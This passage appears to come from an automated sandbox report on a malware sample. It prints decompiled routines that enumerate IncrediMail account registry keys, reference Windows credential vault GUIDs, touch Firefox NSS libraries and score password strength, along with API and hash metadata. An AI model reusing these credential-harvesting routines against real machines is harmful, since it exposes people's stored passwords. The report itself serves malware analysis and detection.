• Instruction Fuzzy Hash: A0112875544205BFDB10AFA4AC48B9A7FB8EB08316F118176F906E22A1DB748A44CA69
Uniqueness

Uniqueness Score: -1.00%

APIs
• strcpy.MSVCRT(?,Common Programs,0040F56A,?,?,?,?,?,00000104), ref: 0040F4BF
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 3177657795-318151290
• Opcode ID: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
• Instruction ID: 3fcc29bccd1c625ad2997487a879199120d1d943b4c0761a6650e27991626466
• Opcode Fuzzy Hash: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
• Instruction Fuzzy Hash: B9F01D732BEE0A60D43405681F06EF70402A0F17553BA86336D42F5ED6E9BC888E60AF
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled routine (listing truncated in the report). Its first action is to open the
   registry key "Software\IncrediMail\Identities" through E0040F1B0, the RegOpenKeyExA
   wrapper listed in the APIs section above. */
E00402F9C(void* __eax, void* __ecx, void* __fp0, void* _a4) {
	void* _v8;
	int _v12;
	int _v16;
	void _v271;
	char _v272;   /* 256-byte stack buffer */
	void _v527;
	char _v528;   /* 256-byte stack buffer */
	void _v827;
	char _v828;   /* 300-byte stack buffer */
	void* __edi;
	void* __esi;
	long _t40;
	void* _t44;
	void* _t55;
	void* _t60;
	void* _t66;
	void* _t67;
	void* _t71;
	void* _t72;
	void* _t73;
	void* _t74;
	void* _t77;

	_t77 = __fp0;
	_t66 = __ecx;
	_t67 = __eax;
	_t40 = E0040F1B0(_a4, "Software\\IncrediMail\\Identities",  &_a4);  /* RegOpenKeyExA wrapper; opened HKEY returned via &_a4 */
	_t72 = _t71 + 0xc;   /* cdecl stack cleanup of the three arguments */
                                                                                                                                                                        				if(_t40 == 0) {
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					_v272 = 0;
                                                                                                                                                                        					memset( &_v271, 0, 0xff);
                                                                                                                                                                        					_t44 = E0040F276(_a4, 0,  &_v272);
                                                                                                                                                                        					_t73 = _t72 + 0x18;
                                                                                                                                                                        					while(_t44 == 0) {
                                                                                                                                                                        						E0040F232(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
                                                                                                                                                                        						_v828 = 0;
                                                                                                                                                                        						memset( &_v827, 0, 0x12b);
                                                                                                                                                                        						sprintf( &_v828, "%s\\Accounts",  &_v272);
                                                                                                                                                                        						_t55 = E0040F1B0(_a4,  &_v828,  &_v8);
                                                                                                                                                                        						_t74 = _t73 + 0x38;
                                                                                                                                                                        						if(_t55 == 0) {
                                                                                                                                                                        							_v16 = 0;
                                                                                                                                                                        							_v528 = 0;
                                                                                                                                                                        							memset( &_v527, 0, 0xff);
                                                                                                                                                                        							_t60 = E0040F276(_v8, 0,  &_v528);
                                                                                                                                                                        							_t74 = _t74 + 0x18;
                                                                                                                                                                        							while(_t60 == 0) {
                                                                                                                                                                        								E00402D74(_t66, _t67, 0xff, _t77, _v8,  &_v528);
                                                                                                                                                                        								_v16 = _v16 + 1;
                                                                                                                                                                        								_t60 = E0040F276(_v8, _v16,  &_v528);
                                                                                                                                                                        								_t74 = _t74 + 0xc;
                                                                                                                                                                        							}
                                                                                                                                                                        							RegCloseKey(_v8);
                                                                                                                                                                        						}
                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                        						_t44 = E0040F276(_a4, _v12,  &_v272);
                                                                                                                                                                        						_t73 = _t74 + 0xc;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t40 = RegCloseKey(_a4);
                                                                                                                                                                        				}
                                                                                                                                                                        				 *((char*)(_t67 + 0xa9c)) = 0;
                                                                                                                                                                        				return _t40;
                                                                                                                                                                        			}

APIs
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
• memset.MSVCRT ref: 00402FDF
  • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
• memset.MSVCRT ref: 0040302C
• sprintf.MSVCRT ref: 00403044
• memset.MSVCRT ref: 00403075
• RegCloseKey.ADVAPI32(?), ref: 004030BD
• RegCloseKey.ADVAPI32(?), ref: 004030E6
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$Close$EnumOpensprintf
• String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
• API String ID: 3672803090-3168940695
• Opcode ID: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
• Instruction ID: 768b3681e431995c61ece500f3f0ca2292d3b8ebaed2eb0df27a6a0be2325633
• Opcode Fuzzy Hash: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
• Instruction Fuzzy Hash: 27316FB680020DBFDB21EB51CC81EEE7B7CAF14344F0041B6B908A1151E7799F989F65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 48%
			E00407BCE(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t39;
				char* _t49;
				void* _t51;
				int _t64;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E00412360(0x204c, __ecx);
				// walk every item of the menu handle; _v4 is the current item index
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t71 = _t71 + 0xc;
						// MENUITEMINFOA in _a8: cbSize = 0x30, fMask = 0x36, dwTypeData -> _a56 (0x1000-byte text buffer), cch = 0x1000
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							// _a28 sits at the hSubMenu slot of the struct: a non-null value recurses into the submenu
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E00407BCE(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t64 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						// find the tab character that separates the item text from its accelerator
						_t49 = strchr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x4181b4 =  *0x4181b4 + 1;
								_t64 =  *0x4181b4 + 0x11558;
								__eflags = _t64;
							} else {
								_t64 = _v4 + 0x11171;
							}
						}
						_t51 = E00407EF3(_t64,  &_a4160);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
                                                                                                                                                                        								strcat( &_a4160, _v0);
                                                                                                                                                                        								_pop(_t59);
                                                                                                                                                                        							}
                                                                                                                                                                        							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        						L14:
                                                                                                                                                                        						_v4 = _v4 + 1;
                                                                                                                                                                        						_t39 = _v4;
                                                                                                                                                                        					} while (_t39 < _a4);
                                                                                                                                                                        					goto L15;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
• String ID: 0$6
• API String ID: 1757351179-3849865405
• Opcode ID: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
• Instruction ID: b54eda8ed3125ae11668051ec90bd02c66b6cc1d7fa6bc8d4742b266666783d1
• Opcode Fuzzy Hash: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
• Instruction Fuzzy Hash: 01319E7280C384AFD7209F55D84099BBBE9FF88354F14893EF59492250D379EA44CB6B
Uniqueness

Uniqueness Score: -1.00%

APIs
• UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
• UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F02A
• UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
• memcpy.MSVCRT ref: 0040F075
• CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
Strings
• 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F025
• 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F011
• 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F01E
• 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040F032
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FromStringUuid$FreeTaskmemcpy
• String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
• API String ID: 1640410171-2022683286
• Opcode ID: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
• Instruction ID: b02d4c6ee9d97a63d35e72255114f680a0148db4ebcc5a4c1265e43ba903851c
• Opcode Fuzzy Hash: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
• Instruction Fuzzy Hash: 8C115B7251012EAACB21EEA4DD40EFB37ECAB48354F050537FD41E3241EA74E9598BA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
			E00404841(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryA("comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

Statement addresses (per-statement column from the report): 0x0040484e to 0x004048bf

APIs
• LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404860
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
• FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404886
• #17.COMCTL32(?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404894
• MessageBoxA.USER32 ref: 004048B1
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
• Instruction ID: fc2202cf77027b42572104eeb985269ec1b891a521d9ed4889cd7b549b4d3d81
• Opcode Fuzzy Hash: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
• Instruction Fuzzy Hash: E001D6767906527BD7116FA09C4ABAF7EECDB85B4BB008435F602F1180EA78DE02825C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040E507() {
	int _t3;
	struct HINSTANCE__* _t5;
	struct HINSTANCE__* _t6;
	struct HINSTANCE__* _t9;

	/* look up the Firefox NSS / SQLite modules; GetModuleHandleA does not raise the reference count */
	_t6 = GetModuleHandleA("nss3.dll");
	_t5 = GetModuleHandleA("sqlite3.dll");
	_t3 = GetModuleHandleA("mozsqlite3.dll");
	_t9 = _t3;
	/* unload whichever of them is currently mapped */
	if(_t6 != 0) {
		_t3 = FreeLibrary(_t6);
	}
	if(_t5 != 0) {
		_t3 = FreeLibrary(_t5);
	}
	if(_t9 != 0) {
		return FreeLibrary(_t9);
	}
	return _t3;
}

Statement addresses (per-statement column from the report): 0x0040e51d to 0x0040e54b

APIs
• GetModuleHandleA.KERNEL32(nss3.dll,73B757D0,?,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E516
• GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E51F
• GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E528
• FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E537
• FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E53E
• FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E545
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FreeHandleLibraryModule
• String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
• API String ID: 662261464-3550686275
• Opcode ID: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
• Instruction ID: d135409c02d172e6769d1cedb18aaef1940c31153c91c0802dc404148c0ad013
• Opcode Fuzzy Hash: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
• Instruction Fuzzy Hash: 31E048E6B4133D7689106AF65C44DBBAE5CC885AE63150877AD0473284EEA99D0186F8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
E0040E7E3(char* __edi, char* __esi) {
	void _v267;
	char _v268;
	char* _t8;	/* used below without a declaration in the decompiler output */
	char* _t15;
	void* _t38;
	char* _t48;
	char* _t49;	/* used below without a declaration in the decompiler output */

	_t49 = __esi;	/* __esi: input path, __edi: output buffer (returned) */
	_t48 = __edi;
	if(__esi[1] != 0x3a) {	/* 0x3a == ':' : input is not already "X:\..." */
		_t15 = strchr( &(__esi[2]), 0x3a);
		if(_t15 == 0) {
			/* no drive letter anywhere; test for a "\systemroot" prefix (the decompiler lost the first argument) */
			_t38 = E00406A01(0, "\\systemroot");
			if(_t38 < 0) {
				if( *__esi != 0x5c) {	/* 0x5c == '\\' */
					strcpy(__edi, __esi);
				} else {
					/* rooted path without a drive: prefix the first two characters ("X:") of the buffer filled by E0040632F */
					_v268 = 0;
					memset( &_v267, 0, 0x104);
					E0040632F( &_v268);
					memcpy(__edi,  &_v268, 2);
					__edi[2] = 0;
					strcat(__edi, __esi);
				}
			} else {
				/* "\systemroot..." : replace the 11-byte (0xb) prefix with the buffer filled by E0040632F */
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				E0040632F( &_v268);
				strcpy(__edi,  &_v268);
				_t8 =  &(_t49[0xb]); // 0xb
				strcat(__edi, _t38 + _t8);
			}
			L11:
			return _t48;
		}
		/* ':' found after offset 2 (e.g. "\??\C:\..."): copy from the drive letter that precedes it */
		_push(_t15 - 1);
		L4:
		strcpy(_t48, ??);	/* ?? is the pointer pushed before the jump to L4 */
		goto L11;
	}
	/* input already starts with "X:": copy verbatim */
	_push(__esi);
	goto L4;
}









APIs
• strchr.MSVCRT ref: 0040E7FB
• strcpy.MSVCRT(?,-00000001), ref: 0040E809
  • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A13
  • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A1B
  • Part of subcall function 00406A01: _memicmp.MSVCRT ref: 00406A39
• strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E859
• strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E864
• memset.MSVCRT ref: 0040E840
  • Part of subcall function 0040632F: GetWindowsDirectoryA.KERNEL32(00418550,00000104,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406344
  • Part of subcall function 0040632F: strcpy.MSVCRT(00000000,00418550,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406354
• memset.MSVCRT ref: 0040E888
• memcpy.MSVCRT ref: 0040E8A3
• strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E8AE
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
• String ID: \systemroot
• API String ID: 1680921474-1821301763
• Opcode ID: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
• Instruction ID: 059b6355fafdf26fa7c647f60efba09ddadb95c968e3db809f61c631ea6cdf1b
• Opcode Fuzzy Hash: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
• Instruction Fuzzy Hash: D321DA725082446DF764B2628D82FEB66EC5B19344F10446FF685E10C1EAFC99D4862A
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 83%
E00405BEE(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
	void* __esi;
	intOrPtr* _t27;
	void* _t30;
	struct HWND__* _t32;
	void* _t35;
	intOrPtr* _t36;

	_t30 = __edx;
	_t27 = __ecx;
	_push(__ebx);
	_push(__edi);
	_t32 =  *(__ecx + 4);
	_t35 = __ecx + 0xc;
	 *(_t35 + 0x10) = _t32;
	GetClientRect(_t32, _t35 + 0xa14);
	 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
	GetWindow(GetWindow(_t32, 5), 0);
	do {
		__eax = E00401601(__edi, __esi);
		__edi = GetWindow(__edi, 2);
	} while (__edi != 0);
	__esi = GetDlgItem;
	__edi = 0x3ed;
	__eax = GetDlgItem( *(__ebx + 4), 0x3ed);
	"VWh\\MA"();
	 *__esp = 0x3ee;
	__eax = GetDlgItem( *(__ebx + 4), __eax);
	"VWh\\MA"();
	 *__esp = 0x3ef;
	__eax = GetDlgItem( *(__ebx + 4), __eax);
	"VWh\\MA"();
	 *__esp = 0x3f4;
	"VWh\\MA"();
	__eax =  *(__ebx + 4);
	__ecx = __eax;
	GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
	_pop(__edi);
	_pop(__esi);
	__ecx = __ebx;
	_pop(__ebx);
	_t36 = _t27;
	 *((intOrPtr*)( *_t36 + 4))(1, _t35);
	 *((intOrPtr*)( *_t36 + 0x18))();
	E0040649B(_t30,  *((intOrPtr*)(_t36 + 4)));
	return 0;
}


APIs
• GetClientRect.USER32 ref: 00405C05
• GetWindow.USER32(?,00000005), ref: 00405C1D
• GetWindow.USER32(00000000), ref: 00405C20
  • Part of subcall function 00401601: GetWindowRect.USER32 ref: 00401610
  • Part of subcall function 00401601: MapWindowPoints.USER32 ref: 0040162B
• GetWindow.USER32(00000000,00000002), ref: 00405C2C
• GetDlgItem.USER32 ref: 00405C43
• GetDlgItem.USER32 ref: 00405C55
• GetDlgItem.USER32 ref: 00405C67
• GetDlgItem.USER32 ref: 00405C79
• GetDlgItem.USER32 ref: 00405C87
• SetFocus.USER32(00000000), ref: 00405C8A
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ItemWindow$Rect$ClientFocusPoints
• String ID:
• API String ID: 2187283481-0
                                                                                                                                                                        • Opcode ID: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                                                                                                                                                                        • Instruction ID: 70b7e768433fb03072553d07e5bd29f06e019e0bb4b5ab736e3f65cd75bfe615
                                                                                                                                                                        • Opcode Fuzzy Hash: 969ea17bacca8ef9e6374e910937896070187056b77a04c01a0c72c457c00c9d
                                                                                                                                                                        • Instruction Fuzzy Hash: 09118271500304ABDB216F31CC89E5BBFADEF81715F05883AB444AB1A1CB7DD8018B28
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                        			E00401A0F(char* __edi, int __fp0) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				int _v28;
                                                                                                                                                                        				int _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				void* _v56;
                                                                                                                                                                        				void* _v60;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				int _t79;
                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                        				int _t81;
                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                        				int _t98;
                                                                                                                                                                        				int _t100;
                                                                                                                                                                        				void* _t104;
                                                                                                                                                                        				void* _t106;
                                                                                                                                                                        				intOrPtr _t115;
                                                                                                                                                                        				char _t117;
                                                                                                                                                                        				char* _t118;
                                                                                                                                                                        				void* _t119;
                                                                                                                                                                        				void* _t120;
                                                                                                                                                                        				int _t122;
                                                                                                                                                                        				signed int _t123;
                                                                                                                                                                        				int* _t125;
                                                                                                                                                                        				int _t159;
                                                                                                                                                                        				int _t165;
                                                                                                                                                                        
                                                                                                                                                                        				_t159 = __fp0;
                                                                                                                                                                        				_t118 = __edi;
                                                                                                                                                                        				_t125 = (_t123 & 0xfffffff8) - 0x40;
                                                                                                                                                                        				_t79 = strlen(__edi);
                                                                                                                                                                        				asm("fldz");
                                                                                                                                                                        				_t104 = 0;
                                                                                                                                                                        				_v28 = __fp0;
                                                                                                                                                                        				_t120 = 0;
                                                                                                                                                                        				_t106 = _t119;
                                                                                                                                                                        				_v36 = _t79;
                                                                                                                                                                        				_v56 = 0;
                                                                                                                                                                        				_v52 = 0;
                                                                                                                                                                        				_v48 = 0;
                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                        				_v60 = 0;
                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                        				_v12 = 0x20;
                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				if(_t79 > 0) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t117 =  *((intOrPtr*)(_t120 + _t118));
                                                                                                                                                                        						_v64 = _t117;
                                                                                                                                                                        						if(_t117 - 0x41 <= 0x19) {
                                                                                                                                                                        							_v56 = _v56 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t117 - 0x61 <= 0x19) {
                                                                                                                                                                        							_v52 = _v52 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t117 - 0x30 <= 9) {
                                                                                                                                                                        							_v48 = _v48 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t117 - 0x20 <= 0xf) {
                                                                                                                                                                        							_v44 = _v44 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t117 - 0x3a <= 6) {
                                                                                                                                                                        							_v60 = _v60 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t117 - 0x5b <= 5) {
                                                                                                                                                                        							_v60 = _v60 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t117 < 0x7b) {
                                                                                                                                                                        							L16:
                                                                                                                                                                        							if(_t117 > 0x7e) {
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        						} else {
                                                                                                                                                                        							if(_t117 > 0x7e) {
                                                                                                                                                                        								L17:
                                                                                                                                                                        								_v40 = _v40 + 1;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v60 = _v60 + 1;
                                                                                                                                                                        								goto L16;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t120 != _t104) {
                                                                                                                                                                        							_t94 = 0;
                                                                                                                                                                        							if(_v8 <= 0) {
                                                                                                                                                                        								L27:
                                                                                                                                                                        								_t94 = _t94 | 0xffffffff;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								L21:
                                                                                                                                                                        								L21:
                                                                                                                                                                        								if(_t94 < 0 || _t94 >= _v8) {
                                                                                                                                                                        									_t115 = 0;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t115 =  *((intOrPtr*)(_v20 + _t94));
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_t115 == _t117) {
                                                                                                                                                                        									goto L28;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t94 = _t94 + 1;
                                                                                                                                                                        								if(_t94 < _v8) {
                                                                                                                                                                        									goto L21;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									goto L27;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							L28:
                                                                                                                                                                        							_t104 = 0;
                                                                                                                                                                        							if(_t94 < 0) {
                                                                                                                                                                        								E004045F2( &_v20, _v64);
                                                                                                                                                                        								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
                                                                                                                                                                        								_pop(_t106);
                                                                                                                                                                        								if(_t98 != 1) {
                                                                                                                                                                        									_t47 = _t98 - 2; // -2
                                                                                                                                                                        									_t106 = _t47;
                                                                                                                                                                        									if(_t106 > 3) {
                                                                                                                                                                        										if(_t98 < 6) {
                                                                                                                                                                        											if(_t98 > 0xa) {
                                                                                                                                                                        												goto L40;
                                                                                                                                                                        											}
                                                                                                                                                                        										} else {
                                                                                                                                                                        											if(_t98 > 0xa) {
                                                                                                                                                                        												goto L40;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t159 = _v28 +  *0x4155a0;
                                                                                                                                                                        											}
                                                                                                                                                                        											goto L41;
                                                                                                                                                                        										}
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t159 = _v28 +  *0x4155a8;
                                                                                                                                                                        										goto L41;
                                                                                                                                                                        									}
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t165 = _v28;
						goto L30;
					}
				} else {
					_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
					_t165 = _v28;
					_pop(_t106);
					if(_t100 != 0) {
						_t159 = _t165 +  *0x4155b0;
					} else {
						L30:
						_t159 = _t165 +  *0x4155b8;
					}
					goto L41;
				}
			} else {
				E004045F2( &_v20, _v64);
				L40:
				_t159 = _v28 +  *0x415598;
				L41:
				_v28 = _t159;
			}
			_t120 = _t120 + 1;
		} while (_t120 < _v36);
	}
	_v64 = _t104;
	_t80 = 0x1a;
	if(_v56 != _t104) {
		_v64 = _t80;
	}
	if(_v52 != _t104) {
		_v64 = _v64 + _t80;
	}
	if(_v48 != _t104) {
		_v64 = _v64 + 0xa;
	}
	if(_v44 != _t104) {
		_v64 = _v64 + 0x10;
	}
	if(_v60 != _t104) {
		_v64 = _v64 + 0x11;
	}
	if(_v40 != _t104) {
		_v64 = _v64 + 0x1e;
	}
	if(_v64 <= _t104) {
		if(_v20 != _t104) {
			free(_v20);
		}
		_t81 = 0;
	} else {
		asm("fild dword [esp+0xc]");
		_push(_t106);
		_push(_t106);
		 *_t125 = _t159;
		L00412066();
